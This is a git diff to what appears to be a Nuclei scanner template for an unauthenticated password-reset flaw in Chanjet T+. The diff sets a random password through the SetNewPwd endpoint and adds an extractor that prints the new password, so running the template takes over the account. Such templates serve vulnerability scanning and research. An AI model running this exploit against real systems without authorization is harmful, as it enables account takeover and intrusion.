diff --git a/http/vulnerabilities/chanjet-tplus/chanjet-tplus-unauth-update.yaml b/http/vulnerabilities/chanjet-tplus/chanjet-tplus-unauth-update.yaml
index 91f11a4c65..8d6373cadf 100644
--- a/http/vulnerabilities/chanjet-tplus/chanjet-tplus-unauth-update.yaml
+++ b/http/vulnerabilities/chanjet-tplus/chanjet-tplus-unauth-update.yaml
@@ -11,13 +11,17 @@ info:
     verified: true
   tags: tplus,unauth,chanjet,intrusive
 
+variables:
+  password: '{{randstr}}'
+  hash: '{{md5("{{password}}")}}'
+
 http:
   - method: GET
     path:
       - "{{BaseURL}}/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd"
 
     body: |
-      {"pwdNew":"{{md5(randstr)}}"}
+      {"pwdNew":"{{hash}}"}
 
     matchers-condition: and
     matchers:
@@ -34,3 +38,8 @@ http:
       - type: status
         status:
           - 200
+
+    extractors:
+      - type: dsl
+        dsl:
+          - '"Password: " + password'